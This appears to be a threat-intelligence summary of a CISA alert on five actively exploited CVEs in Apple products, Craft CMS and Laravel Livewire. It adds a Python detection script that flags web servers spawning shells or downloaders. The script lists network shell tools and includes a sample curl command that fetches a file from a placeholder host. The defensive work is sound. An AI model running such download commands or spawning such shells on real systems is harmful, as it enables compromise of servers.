
CISA Adds Five Known Exploited Vulnerabilities to Catalog

CISA has updated its Known Exploited Vulnerabilities (KEV) Catalog with five new actively exploited vulnerabilities affecting Apple products, Craft CMS, and Laravel Livewire. Organizations are strongly urged to prioritize timely remediation of these flaws to reduce exposure to cyberattacks.

Sens: Immediate | Conf: high | Analyzed: 2026-03-20

Authors: CISA

Source: CISA

Key Takeaways

  • CISA added five new vulnerabilities to the Known Exploited Vulnerabilities (KEV) Catalog due to evidence of active exploitation.
  • The vulnerabilities affect Apple products, Craft CMS, and Laravel Livewire.
  • Exploited flaws include buffer overflows, code injection, and improper locking.
  • Federal Civilian Executive Branch (FCEB) agencies are required to remediate these vulnerabilities under BOD 22-01.
  • All organizations are strongly urged to prioritize patching these vulnerabilities to reduce cyberattack exposure.

Affected Systems

  • Apple Multiple Products
  • Craft CMS
  • Laravel Livewire

Vulnerabilities (CVEs)

  • CVE-2025-31277
  • CVE-2025-32432
  • CVE-2025-43510
  • CVE-2025-43520
  • CVE-2025-54068

Attack Chain

Threat actors are actively exploiting specific vulnerabilities in Apple products (buffer overflows, improper locking), Craft CMS (code injection), and Laravel Livewire (code injection) to compromise affected systems. Specific attack chains, payloads, and post-exploitation activities are not detailed in the alert.

Detection Availability

  • YARA Rules: No
  • Sigma Rules: No
  • Snort/Suricata Rules: No
  • KQL Queries: No
  • Splunk SPL Queries: No
  • EQL Queries: No
  • Other Detection Logic: No

No specific detection rules or queries are provided in the alert.

Detection Engineering Assessment

  • EDR Visibility: Low — The alert only lists CVEs without detailing specific post-exploitation behaviors, processes, or payloads that EDR would detect.
  • Network Visibility: Low — No network indicators, exploit traffic patterns, or C2 infrastructure details are provided.
  • Detection Difficulty: Hard — Without specific IOCs or behavioral details, detection relies entirely on identifying vulnerable software versions via scanning rather than detecting active exploitation telemetry.

Required Log Sources

  • Vulnerability Management Scans
  • Patch Management Logs
  • Web Application Firewall (WAF) Logs

Hunting Hypotheses

  • Hypothesis: Search for unexpected child processes spawning from Craft CMS or Laravel Livewire web application processes, indicating potential successful code injection.
  • Telemetry: Process Creation (Windows Event ID 4688 / Sysmon Event ID 1) or Linux auditd execve events
  • ATT&CK Stage: Execution
  • FP Risk: Low
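One way to run the hunting hypothesis above over process-creation telemetry, as an added example that is not part of the CISA alert. The worker-process names, the suspicious and allowed child lists, and the sample events are all assumptions constructed for illustration; tune them to the PHP stack actually serving Craft CMS or Livewire.

```python
import os
from dataclasses import dataclass

# Parent images that typically serve Craft CMS / Laravel Livewire (assumption).
WEB_WORKERS = {"php", "php-cgi", "apache2", "httpd", "nginx"}
# Children a PHP web worker normally has no reason to spawn (assumption).
SUSPICIOUS_CHILDREN = {"sh", "bash", "dash", "zsh", "cmd", "powershell",
                       "curl", "wget", "nc", "ncat", "python3", "perl", "base64"}
# Expected helper children to suppress, e.g. image processing (assumption).
ALLOWED_CHILDREN = {"convert", "magick", "gs"}


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (Sysmon Event ID 1 / auditd execve)."""
    host: str
    parent_image: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    """Normalise a Windows or Linux image path to a lowercase program name."""
    name = os.path.basename(path.replace("\\", "/")).lower()
    return name[:-4] if name.endswith(".exe") else name


def _is_web_worker(name: str) -> bool:
    # php-fpm binaries often carry a version suffix, e.g. php-fpm8.2
    return name in WEB_WORKERS or name.startswith("php-fpm")


def is_suspicious(ev: ProcEvent) -> bool:
    """True when a web worker spawns a shell/downloader it should not need."""
    parent, child = _basename(ev.parent_image), _basename(ev.image)
    if not _is_web_worker(parent) or child in ALLOWED_CHILDREN:
        return False
    return child in SUSPICIOUS_CHILDREN


def hunt(events):
    """Return only the events worth an analyst's attention."""
    return [ev for ev in events if is_suspicious(ev)]


# Constructed sample telemetry, not data from the alert.
SAMPLE_EVENTS = [
    ProcEvent("web01", "/usr/sbin/php-fpm8.2", "/usr/bin/dash", "sh -c id"),
    ProcEvent("web01", "/usr/sbin/php-fpm8.2", "/usr/bin/convert", "convert a.png b.jpg"),
    ProcEvent("web02", "/usr/sbin/nginx", "/usr/sbin/nginx", "nginx: worker process"),
    ProcEvent("web02", "/usr/bin/php", "/usr/bin/curl", "curl -o /tmp/x http://example.invalid/x"),
]
```

Feed it real Sysmon or auditd records mapped onto `ProcEvent` and treat each hit as a lead to pivot on by host and command line, not as a confirmed compromise.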

Control Gaps

  • Lack of timely patching for public-facing applications and endpoints.

Key Behavioral Indicators

  • Presence of vulnerable software versions on the network.

False Positive Assessment

  • Low

Recommendations

Immediate Mitigation

  • Identify and patch all instances of Apple products, Craft CMS, and Laravel Livewire affected by the listed CVEs.

Infrastructure Hardening

  • Implement a robust vulnerability management program to ensure timely patching of KEV catalog items.
  • Deploy Web Application Firewalls (WAF) to monitor and filter potentially malicious traffic targeting web applications like Craft CMS and Laravel Livewire.

User Protection

  • Ensure Apple endpoint devices (macOS, iOS, etc.) are updated to the latest vendor-supplied versions.

Security Awareness

  • Educate IT and security teams on the requirements of BOD 22-01 and the importance of prioritizing the CISA KEV catalog in patch management workflows.

MITRE ATT&CK Mapping

  • T1190 - Exploit Public-Facing Application
  • T1203 - Exploitation for Client Execution